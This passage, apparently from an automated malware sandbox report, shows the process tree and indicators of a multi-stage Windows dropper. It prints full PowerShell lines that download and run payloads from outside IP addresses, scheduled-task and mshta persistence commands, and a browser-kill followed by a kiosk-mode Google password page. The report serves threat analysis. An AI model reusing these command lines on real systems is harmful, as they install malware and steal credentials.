4860 taskkill.exe Token: SeShutdownPrivilege 3380 Explorer.EXE Token: SeCreatePagefilePrivilege 3380 Explorer.EXE Token: SeDebugPrivilege 2724 taskkill.exe Token: SeShutdownPrivilege 3380 Explorer.EXE Token: SeCreatePagefilePrivilege 3380 Explorer.EXE Token: SeDebugPrivilege 4748 taskkill.exe Token: SeShutdownPrivilege 3380 Explorer.EXE Token: SeCreatePagefilePrivilege 3380 Explorer.EXE Token: SeDebugPrivilege 3060 taskkill.exe Token: SeShutdownPrivilege 3380 Explorer.EXE Token: SeCreatePagefilePrivilege 3380 Explorer.EXE Token: SeShutdownPrivilege 3380 Explorer.EXE Token: SeCreatePagefilePrivilege 3380 Explorer.EXE Token: SeShutdownPrivilege 3380 Explorer.EXE Token: SeCreatePagefilePrivilege 3380 Explorer.EXE Token: SeDebugPrivilege 3872 firefox.exe Token: SeDebugPrivilege 3872 firefox.exe -
Suspicious use of FindShellTrayWindow 37 IoCs
pid Process 228 15IU9MAI67GYH0XHEXQP4VKU7HW.exe 3928 840fb92a2b.exe 3928 840fb92a2b.exe 3928 840fb92a2b.exe 4912 notepad.exe 4532 07d2efa8fe.exe 3380 Explorer.EXE 3380 Explorer.EXE 4532 07d2efa8fe.exe 4532 07d2efa8fe.exe 4532 07d2efa8fe.exe 4532 07d2efa8fe.exe 4532 07d2efa8fe.exe 4532 07d2efa8fe.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 4532 07d2efa8fe.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 4532 07d2efa8fe.exe -
Suspicious use of SendNotifyMessage 32 IoCs
pid Process 3928 840fb92a2b.exe 3928 840fb92a2b.exe 3928 840fb92a2b.exe 4532 07d2efa8fe.exe 4532 07d2efa8fe.exe 4532 07d2efa8fe.exe 4532 07d2efa8fe.exe 4532 07d2efa8fe.exe 4532 07d2efa8fe.exe 4532 07d2efa8fe.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 4532 07d2efa8fe.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 3872 firefox.exe 4532 07d2efa8fe.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3296 cnntXtU.exe 3872 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3616 wrote to memory of 228 3616 dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe 93 PID 3616 wrote to memory of 228 3616 dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe 93 PID 3616 wrote to memory of 228 3616 dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe 93 PID 228 wrote to memory of 2816 228 15IU9MAI67GYH0XHEXQP4VKU7HW.exe 94 PID 228 wrote to memory of 2816 228 15IU9MAI67GYH0XHEXQP4VKU7HW.exe 94 PID 228 wrote to memory of 2816 228 15IU9MAI67GYH0XHEXQP4VKU7HW.exe 94 PID 2816 wrote to memory of 2348 2816 rapes.exe 97 PID 2816 wrote to memory of 2348 2816 rapes.exe 97 PID 2348 wrote to memory of 684 2348 PcAIvJ0.exe 98 PID 2348 wrote to memory of 684 2348 PcAIvJ0.exe 98 PID 684 wrote to memory of 4960 684 cmd.exe 100 PID 684 wrote to memory of 4960 684 cmd.exe 100 PID 2816 wrote to memory of 1488 2816 rapes.exe 101 PID 2816 wrote to memory of 1488 2816 rapes.exe 101 PID 2816 wrote to memory of 1488 2816 rapes.exe 101 PID 1488 wrote to memory of 1012 1488 nhDLtPT.exe 102 PID 1488 wrote to memory of 1012 1488 nhDLtPT.exe 102 PID 1488 wrote to memory of 1012 1488 nhDLtPT.exe 102 PID 2816 wrote to memory of 3296 2816 rapes.exe 103 PID 2816 wrote to memory of 3296 2816 rapes.exe 103 PID 1012 wrote to memory of 1812 1012 Gxtuum.exe 104 PID 1012 wrote to memory of 1812 1012 Gxtuum.exe 104 PID 1012 wrote to memory of 1812 1012 Gxtuum.exe 104 PID 2816 wrote to memory of 3928 2816 rapes.exe 105 PID 2816 wrote to memory of 3928 2816 rapes.exe 105 PID 2816 wrote to memory of 3928 2816 rapes.exe 105 PID 3928 wrote to memory of 4088 3928 840fb92a2b.exe 106 PID 3928 wrote to memory of 4088 3928 840fb92a2b.exe 106 PID 3928 wrote to memory of 4088 3928 840fb92a2b.exe 106 PID 3928 wrote to memory of 3392 3928 840fb92a2b.exe 107 PID 3928 wrote to memory of 3392 3928 840fb92a2b.exe 107 PID 3928 wrote to memory of 3392 3928 840fb92a2b.exe 107 PID 4088 wrote to memory of 3108 4088 cmd.exe 109 PID 4088 wrote to memory of 3108 4088 cmd.exe 109 PID 4088 wrote to memory of 3108 4088 cmd.exe 109 PID 3392 wrote to memory of 2132 3392 mshta.exe 110 PID 3392 wrote to memory of 2132 3392 mshta.exe 110 PID 3392 wrote to memory of 2132 3392 mshta.exe 110 PID 2816 wrote to memory of 3996 2816 rapes.exe 113 PID 2816 wrote to memory of 3996 2816 rapes.exe 113 PID 2816 wrote to memory of 3996 2816 rapes.exe 113 PID 3996 wrote to memory of 4840 3996 cmd.exe 115 PID 3996 wrote to memory of 4840 3996 cmd.exe 115 PID 3996 wrote to memory of 4840 3996 cmd.exe 115 PID 4960 wrote to memory of 3928 4960 powershell.exe 116 PID 4960 wrote to memory of 3928 4960 powershell.exe 116 PID 3928 wrote to memory of 372 3928 powershell.exe 118 PID 3928 wrote to memory of 372 3928 powershell.exe 118 PID 3996 wrote to memory of 2320 3996 cmd.exe 119 PID 3996 wrote to memory of 2320 3996 cmd.exe 119 PID 3996 wrote to memory of 2320 3996 cmd.exe 119 PID 2320 wrote to memory of 2720 2320 cmd.exe 120 PID 2320 wrote to memory of 2720 2320 cmd.exe 120 PID 2320 wrote to memory of 2720 2320 cmd.exe 120 PID 372 wrote to memory of 4960 372 csc.exe 122 PID 372 wrote to memory of 4960 372 csc.exe 122 PID 3928 wrote to memory of 3380 3928 powershell.exe 56 PID 3996 wrote to memory of 2164 3996 cmd.exe 123 PID 3996 wrote to memory of 2164 3996 cmd.exe 123 PID 3996 wrote to memory of 2164 3996 cmd.exe 123 PID 2164 wrote to memory of 1612 2164 cmd.exe 124 PID 2164 wrote to memory of 1612 2164 cmd.exe 124 PID 2164 wrote to memory of 1612 2164 cmd.exe 124 PID 3996 wrote to memory of 4696 3996 cmd.exe 125 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3380 -
C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe"C:\Users\Admin\AppData\Local\Temp\dc64f828027c06780fb294a93dfb82bd7431170b1f1ba61f2aa5d059e0073b9c.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3616 -
C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe"C:\Users\Admin\AppData\Local\Temp\15IU9MAI67GYH0XHEXQP4VKU7HW.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:228 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6C1.tmp\6C2.tmp\6C3.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"6⤵
- Suspicious use of WriteProcessMemory
PID:684 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4960 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"8⤵
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5wlhjbmh\5wlhjbmh.cmdline"9⤵
- Suspicious use of WriteProcessMemory
PID:372 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4FE0.tmp" "c:\Users\Admin\AppData\Local\Temp\5wlhjbmh\CSCA8772FE477F3431A8E4EB01FFA7070FE.TMP"10⤵PID:4960
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1488 -
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"6⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1012 -
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1812
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"5⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3296
-
-
C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe"C:\Users\Admin\AppData\Local\Temp\10107440101\840fb92a2b.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn I76AamawRik /tr "mshta C:\Users\Admin\AppData\Local\Temp\kxJOvNhGM.hta" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn I76AamawRik /tr "mshta C:\Users\Admin\AppData\Local\Temp\kxJOvNhGM.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3108
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\kxJOvNhGM.hta6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2132 -
C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE"C:\Users\Admin\AppData\Local\TempZZ4155YP6QQWCYZ92BBJNDNC66VQ2PLS.EXE"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4640
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Windows\SysWOW64\timeout.exetimeout /t 26⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4840
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2720
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1612
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- System Location Discovery: System Language Discovery
PID:4696 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2080
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "1bVtkmaEFba" /tr "mshta \"C:\Temp\4buU3vPam.hta\"" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4812
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\4buU3vPam.hta"6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:3812 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4236 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:448
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe"C:\Users\Admin\AppData\Local\Temp\10107670101\ffd8234368.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1936 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:4236
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe"C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4784 -
C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe"C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe"6⤵
- Executes dropped EXE
PID:3800
-
-
C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe"C:\Users\Admin\AppData\Local\Temp\10107680101\cc8fa31301.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1032
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4784 -s 8206⤵
- Program crash
PID:644
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe"C:\Users\Admin\AppData\Local\Temp\10107690101\8e014fc6f7.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2644 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"6⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:4624
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe"C:\Users\Admin\AppData\Local\Temp\10107700101\82ce3de40e.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1032
-
-
C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe"C:\Users\Admin\AppData\Local\Temp\10107710101\250c1f6b4d.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2456 -
C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe"C:\Users\Admin\AppData\Local\Temp\SQMULMKG7P2NOJYV25CC06RC2V3IFM3.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3816
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe"C:\Users\Admin\AppData\Local\Temp\10107720101\860be6c356.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4432
-
-
C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe"C:\Users\Admin\AppData\Local\Temp\10107730101\07d2efa8fe.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4532 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4860
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2724
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4748
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T6⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3060
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking6⤵PID:2456
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking7⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3872 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2016 -parentBuildID 20240401114208 -prefsHandle 1936 -prefMapHandle 1916 -prefsLen 27356 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3219f9b-7f74-406f-9bf8-d68635766d42} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" gpu8⤵PID:2252
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2480 -parentBuildID 20240401114208 -prefsHandle 2456 -prefMapHandle 2452 -prefsLen 28276 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {01c09d46-e774-4e15-ae93-1616266d2440} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" socket8⤵PID:1288
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3184 -childID 1 -isForBrowser -prefsHandle 1436 -prefMapHandle 2628 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4f67990-34d8-4010-9f43-2286c1a1ceb5} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" tab8⤵PID:3272
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4120 -childID 2 -isForBrowser -prefsHandle 4112 -prefMapHandle 4108 -prefsLen 32766 -prefMapSize 244628 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d3dc32dc-7c8f-4fd4-a5d9-9af212b745cc} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" tab8⤵PID:936
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4880 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4872 -prefMapHandle 4868 -prefsLen 32854 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa3abcb1-6eae-4a53-95b8-d1042466a2de} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" utility8⤵
- Checks processor information in registry
PID:5288
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5212 -childID 3 -isForBrowser -prefsHandle 4696 -prefMapHandle 5180 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7c5ed142-abae-401c-8b7c-ee583ef0bbd4} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" tab8⤵PID:5532
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5440 -childID 4 -isForBrowser -prefsHandle 5360 -prefMapHandle 5368 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {653f8cec-3367-4821-af54-fec38fe8fcf9} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" tab8⤵PID:5576
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5548 -childID 5 -isForBrowser -prefsHandle 5628 -prefMapHandle 5624 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1068 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b22b891f-18d5-4a40-acaf-52150da83d07} 3872 "\\.\pipe\gecko-crash-server-pipe.3872" tab8⤵PID:5588
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10107740101\91ff33b7b2.exe"C:\Users\Admin\AppData\Local\Temp\10107740101\91ff33b7b2.exe"5⤵PID:5292
-
-
C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe"C:\Users\Admin\AppData\Local\Temp\10107750101\zY9sqWs.exe"5⤵PID:5648
-
-
C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe"C:\Users\Admin\AppData\Local\Temp\10107760101\PcAIvJ0.exe"5⤵PID:3400
-
